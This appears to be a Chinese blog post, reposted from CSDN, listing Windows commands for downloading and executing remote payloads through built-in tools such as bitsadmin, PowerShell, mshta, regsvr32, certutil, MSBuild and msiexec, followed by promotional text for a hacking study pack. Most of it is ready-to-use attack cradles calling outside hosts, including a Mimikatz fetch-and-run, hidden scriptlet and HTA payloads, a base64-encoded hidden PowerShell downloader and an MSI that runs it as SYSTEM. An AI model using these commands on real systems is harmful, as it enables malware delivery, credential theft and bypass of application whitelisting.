1.bitsadmin命令(只能命令下载到指定路径上,win7以上):
bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\\abc.jpg"
bitsadmin /transfer d90f http://site.com/a %APPDATA%\\d90f.exe&%APPDATA%\\d90f.exe&del %APPDATA%\\d90f.exe
2.powershell命名下载执行:(win7以上)
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
powershell -exec bypass -f \\\\webdavserver\\folder\\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\\111111111111111.exe’)
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\\\1.jpg')
3.mshta命令下载执行
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8
mshta \\\\webdavserver\\folder\\payload.hta
payload.hta
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
4.rundll32命令下载执行
rundll32 \\\\webdavserver\\folder\\payload.dll,entrypoint
rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
参考:https://github.com/3gstudent/Javascript-Backdoor
5.net中的regasm命令下载执行
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /u \\\\webdavserver\\folder\\payload.dll
6.cmd的远程命令下载:
cmd.exe /k < \\\\webdavserver\\folder\\batchfile.txt
7.regsvr32命令下载执行
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\\\webdavserver\\folder\\payload.sct scrobj.dll
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
js.png
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<!\[CDATA\[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
\]\]>
</script>
</registration>
</scriptlet
8.certutil命令下载执行
certutil -urlcache -split -f http://webserver/payload payload
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
9.net中的MSBulid命令下载执行
cmd /V /c "set MB="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe" & !MB! /noautoresponse /preprocess \\\\webdavserver\\folder\\payload.xml > payload.xml & !MB! payload.xml"
10. odbcconf命令下载执行
odbcconf /s /a {regsvr \\\\webdavserver\\folder\\payload\_dll.txt}
11.cscript脚本远程命令下载执行
cscript /b C:\\Windows\\System32\\Printing\_Admin\_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct
cscript //E:jscript \\\\webdavserver\\folder\\payload.txt
downfile.vbs:
' Set your settings
strFileURL = "http://www.it1.net/images/it1\_logo2.jpg"
strHDLocation = "c:\\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
将以上保存为downfile.vbs
输入命令:cscript downfile.vbs
12.pubprn.vbs下载执行命令
cscript /b C:\\Windows\\System32\\Printing\_Admin\_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
13.windows自带命令copy
copy \\\\x.x.x.x\\xx\\poc.exe
xcopy d:\\test.exe \\\\x.x.x.x\\test.exe
14. IEXPLORE.EXE命令下载执行(需要IE存在oday)
"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" http://site.com/exp
15.IEEXC命令下载执行
C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\> caspol -s off
C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\> IEExec http://site.com/files/test64.exe
参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16. msiexec命令下载执行
msiexec /q /i http://site.com/payloads/calc.png
该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述
首先将powershell实现下载执行的代码作base64编码:
$fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'"
$bytes = \[System.Text.Encoding\]::Unicode.GetBytes($fileContent);
$encoded = \[System.Convert\]::ToBase64String($bytes);
$encoded
得到:
KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
完整powershell命令为:
powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
完整wix文件为:
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="\*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product
Name" Version="0.0.1" Manufacturer="@\_xpn\_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" />
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"
ExeCommand='\[cmdline\]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
将其编译,生成msi文件,命令如下:
candle.exe msigen.wix
light.exe msigen.wixobj
生成test.msi
实现功能:
msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi
注:
执行后需要手动结束进程msiexec.exe
结合百度提供的短地址服务(http://dwz.cn/), 实现代码为34个字符,代码如下:
msiexec /q /i http://dwz.cn/6UJpF8
本文转自 https://blog.csdn.net/qq_69775412/article/details/140121369?spm=1001.2014.3001.5502,如有侵权,请联系删除。
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
黑客&网络安全如何学习?
今天只要你给我的文章点赞,我自己多年整理的282G 网安学习资料免费共享给你们,网络安全学习传送门,可点击直达获取哦!
由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了282G视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。